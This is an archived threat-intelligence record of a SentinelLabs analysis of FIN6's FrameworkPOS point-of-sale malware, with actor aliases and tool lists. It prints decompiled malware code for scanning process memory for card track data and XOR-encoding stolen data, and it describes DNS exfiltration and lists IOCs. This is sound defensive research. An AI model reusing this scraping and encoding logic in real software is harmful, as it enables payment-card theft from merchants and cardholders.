{ "id": "4dbd82ed-3bc3-48e9-a4ef-a280adf806d8", "created_at": "2026-04-06T00:06:54.288974Z", "updated_at": "2026-04-10T03:33:53.622356Z", "deleted_at": null, "sha1_hash": "7b57dcbbbc8fd9042c154707f790fdc61be01e07", "title": "FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis \u0026 Internals - SentinelLabs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3733205, "plain_text": "FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis \u0026\r\nInternals - SentinelLabs\r\nBy Vitali Kremez\r\nPublished: 2019-09-19 · Archived: 2026-04-05 18:36:42 UTC\r\nVitali Kremez diving into the FIN6 “FrameworkPOS”, targeting payment card data from Point-of-Sale (POS) or\r\neCommerce systems.\r\nPoint-of-Sale (POS) malware remain to be an active threat for financial cybercrime. POS malware targets systems\r\nthat run physical point-of-sale device and operates by inspecting the process memory for data that matches the\r\nstructure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other\r\ninformation stored on a card’s magnetic stripe. Some of the most prolific POS malware lately include the\r\n“AlinaPOS”, “GlitchPOS”, and “FrameworkPOS”.\r\nAfter the credit cards are first scanned in real time, the personal account number (PAN) and accompanying data\r\nsits in the point-of-sale system’s memory unencrypted while the system determines where to send it for\r\nauthorization. During that time, the point-of-sale malware opens up the process memory searching for elements\r\nrelated to credit card information.\r\nThe FrameworkPOS malware and related variants are linked to the high-profile merchant breaches in the past\r\nincluding the “MozartPOS” variant involved in the Home Depot intrusion. \r\nPOS malware becomes relevant during the Fall shopping season (especially Black Friday) targeting various\r\nbusinesses dealing with live credit card transactions.\r\nClick here to watch the full episode on Dissecting FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis \u0026\r\nInternals\r\n“FrameworkPOS” Malware Internals\r\nOne of the more interesting POS malware is called “FrameworkPOS” variants (including the ones dubbed\r\n“GratefulPOS” and “MozartPOS”). This malware most recently was internally named as “psemonitor_x64.dll.”\r\nFrameworkPOS, also known as TRINITY, was previously linked to the financially motivated hacking collective\r\ncalled FIN6.\r\n Some of the new FIN6 FrameworkPSS malware variants were spotted by revealing that the group utilizes the 64-\r\nbit malware variant with two export functions “workerIntstance” and “debugPoint”.\r\nhttps://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nPage 1 of 6\n\nNotably, FrameworkPOS malware appears to continue to have low detection ratio according to the detections\r\ndisplayed on VirusTotal (as of September 18, 2019, only 9 out of 66 antivirus engines only treat the malware as\r\nsuspicious). \r\nFor the malware analysis purposes, we also analyze the earlier FrameworkPOS version with the purported “grp1”\r\ncampaign identifier and contains debug Track 2 data presumably for testing purposes.\r\nThe FrameworkPOS main function flow is as follows as psuedo-coded in C++ from creating the “caller” thread to\r\nbuild out the communication protocol and resolve necessary host information.\r\nThe excerpt of the main malware functionality is as follows:\r\nCreateThread(0, 0, (LPTHREAD_START_ROUTINE)caller, 0, 0, 0);\r\nwhile ( 1 )\r\n {\r\n time(\u0026v11);\r\n hSnapshot = CreateToolhelp32Snapshot(2u, 0);\r\n if ( hSnapshot == (HANDLE)-1 )\r\n return 0;\r\n pe.dwSize = 296;\r\nif ( !Process32First(hSnapshot, \u0026pe) )\r\n break;\r\n do\r\n {\r\n v8 = 0;\r\n for ( j = 0; j \u003c 0x14; ++j )\r\n {\r\n if ( !strcmp(pe.szExeFile, \u0026aWininit_exe[24 * j]) || strstr(byte_592010, pe.szExeFile) )\r\n {\r\n v8 = 1;\r\n break;\r\n }\r\n }\r\n if ( !v8 )\r\n {\r\nhttps://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nPage 2 of 6\n\nif ( pe.th32ProcessID )\r\n {\r\n dwProcessId = pe.th32ProcessID;\r\n v14 = 1;\r\n dword_592514 = 0;\r\n byte_59136B = 0;\r\n v89 = check_virtualQuery_ex(pe.th32ProcessID, 1);\r\n if ( v89 )\r\n {\r\n scan_memoryfor_card((int)v89);\r\n free((int)v89);\r\n _sleep(200u);\r\n }\r\n }\r\n }\r\n }\r\n while ( Process32Next(hSnapshot, \u0026pe) );\r\n if ( dword_592410 \u003e 0 )\r\n _sleep(10000u s);\r\n CloseHandle(hSnapshot);\r\n time(\u0026v15);\r\n v15 -= v11;\r\n localtime(\u0026v15);\r\n }\r\nThe malware proceeds to blacklist certain processes such as “wininit.exe” when approaches memory scraping in\r\norder to speed necessary card scan logic.\r\nCredit Card Scraping Logic \u0026 Luhn Algorithm\r\nThe malware also validates the card information by running the Luhn algorithm for any purported track data that\r\ndoes not begin with digits “4” (VISA), “5” (Mastercard), “6” (Discover), “34″ (AMEX), “37” (AMEX), “36”\r\n(Diner’s Club), and “300-305” (Diner’s Club).\r\nhttps://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nPage 3 of 6\n\nThe x64 malware version also contains an altered “greedier” version of the Track1/Track2 scanner logic focusing\r\nless on static card prefixes and service codes but for any data that looks like Track1/Track2.\r\nhttps://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nPage 4 of 6\n\nFrameworkPOS Data Encoding: XOR \u0026 Obfuscation\r\nThroughout its execution, the malware builds some notable strings via xoring the byte section in the loop *\r\n(\u0026byte_memory ++) ^= 0x4Dh (via sequence of mov, xor, shl, movsx, and shl calls). Oftentimes, malware coders\r\nbuild string paths to bypass some static anti-virus detection.\r\nNotably, the FrameworkPOS malware obfuscates its stolen data via the hardcoded string and then XOR byte key\r\nof “AA” to strings as follows and converts it into hexadecimals adding to snprintf API call:\r\nsize_t __cdecl enc_func(char *a1, int a2)\r\n{\r\n size_t result;\r\n unsigned int i;\r\n for ( len_enc = 0; ; ++len_enc )\r\n {\r\n result = strlen(a1);\r\n if ( len_enc \u003e= result )\r\n break;\r\n for ( i = 0; i \u003c 69; ++i )\r\n {\r\n if ( (unsigned __int8)a1[len_enc] == byte_42E000[i] )\r\n {\r\n a1[len_enc] = byte_42E048[i];\r\n break;\r\n }\r\n }\r\n a1[len_enc] ^= AA_key;\r\nhttps://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nPage 5 of 6\n\n_snprintf((char *)(a2 + 2 * len_enc), 2u, \"%.2x\", (unsigned __int8)a1[len_enc]);\r\n }\r\n return result;\r\n}\r\nThe XOR key function location is as follows:\r\n------- --------\r\nAddress Function\r\n------- --------\r\n.text:004030DB notice_write_func\r\n.text:00403847 memory_parser\r\n.text:00403873 memory_parser\r\n.text:004039DE memory_parser\r\n.text:00406C43 computer_name_gen\r\nCommand \u0026 Control (C2) Protocol\r\nNotably, the FrameworkPOS malware variant leverages hex with 0xAA byte XOR encoding for exfiltrated data\r\nwith the ping request with the domain name system (DNS) exfiltration protocol.\r\nCredit: @malz_intel\r\nIndicators of Compromise (IOCs):\r\nFrameworkPOS x86:\r\nSHA-256: 81cea9fe7cfe36e9f0f53489411ec10ddd5780dc1813ab19d26d2b7724ff3b38\r\nFrameworkPOS x64:\r\nSHA-256: 7a207137e7b234e680116aa071f049c8472e4fb5990a38dab264d0a4cde126df\r\nC2:\r\nns[.]akamai1811[.]com\r\nns[.]a193-45-3-47-deploy-akamaitechnologies[.]com\r\nSource: https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nhttps://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "references": [ "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/" ], "report_names": [ "fin6-frameworkpos-point-of-sale-malware-analysis-internals-2" ], "threat_actors": [ { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434014, "ts_updated_at": 1775792033, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7b57dcbbbc8fd9042c154707f790fdc61be01e07.pdf", "text": "https://archive.orkl.eu/7b57dcbbbc8fd9042c154707f790fdc61be01e07.txt", "img": "https://archive.orkl.eu/7b57dcbbbc8fd9042c154707f790fdc61be01e07.jpg" } }